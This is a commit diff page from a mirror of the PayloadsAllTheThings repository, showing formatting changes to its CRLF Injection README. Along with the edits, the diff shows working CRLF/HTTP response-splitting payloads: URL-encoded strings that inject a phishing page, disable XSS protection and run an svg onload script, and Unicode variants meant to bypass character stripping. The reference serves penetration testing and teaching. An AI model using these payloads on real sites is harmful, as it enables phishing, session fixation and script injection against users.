gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 07:40:34 -08:00
Code Issues Packages Projects Releases Wiki Activity

Markdown Linting - CORS, CRLF, CSPT, CSRF, Command Injection

Browse Source
This commit is contained in:
Swissky
2025-03-24 16:52:42 +01:00
parent 9465e12b76
commit e6eb436eb1
5 changed files with 101 additions and 131 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
CRLF Injection/README.md
View File

@@ -12,7 +12,6 @@
* [Labs](#labs)
* [References](#references)
## Methodology
HTTP Response Splitting is a security vulnerability where an attacker manipulates an HTTP response by injecting Carriage Return (CR) and Line Feed (LF) characters (collectively called CRLF) into a response header. These characters mark the end of a header and the start of a new line in HTTP responses.
@@ -28,7 +27,6 @@ By injecting a CRLF sequence, the attacker can break the response into two parts
* Cache Poisoning: Forcing incorrect content to be stored in caches.
* Header Manipulation: Altering headers to mislead users or systems
### Session Fixation
A typical HTTP response header looks like this:
@@ -50,18 +48,17 @@ Set-Cookie: admin=true
Now the attacker has set their own cookie.
### Cross Site Scripting
Beside the session fixation that requires a very insecure way of handling user session, the easiest way to exploit a CRLF injection is to write a new body for the page. It can be used to create a phishing page or to trigger an arbitrary Javascript code (XSS).
**Requested page**
**Requested page**:
```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
```
**HTTP response**
**HTTP response**:
```http
Set-Cookie:en
@@ -77,13 +74,13 @@ Content-Length: 34
In the case of an XSS, the CRLF injection allows to inject the `X-XSS-Protection` header with the value value "0", to disable it. And then we can add our HTML tag containing Javascript code .
**Requested page**:
```powershell
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
```
**HTTP Response**:
```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
@@ -97,7 +94,7 @@ ETag: "842fe-597b-54415a5c97a80"
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: https://example.com/[INJECTION STARTS HERE]
Content-Length:35
Content-Length:35
X-XSS-Protection:0
```
@@ -114,10 +111,9 @@ Inject a `Location` header to force a redirect for the user.
[RFC 7230](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4) states that most HTTP header field values use only a subset of the US-ASCII charset.
> Newly defined header fields SHOULD limit their field values to US-ASCII octets.
Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them.
Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them.
| UTF-8 Character | Hex | Unicode | Stripped |
| --------- | --- | ------- | -------- |
@@ -132,7 +128,6 @@ Firefox followed the spec by stripping off any out-of-range characters when sett
```js
嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()
嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()
```
URL encoded version
@@ -145,15 +140,13 @@ URL encoded version
* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
* [Root Me - CRLF](https://www.root-me.org/en/Challenges/Web-Server/CRLF)
* [Root Me - CRLF](https://www.root-me.org/en/Challenges/Web-Server/CRLF)
## References
* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
* [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
- [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
* [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
- [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
* [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
* [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)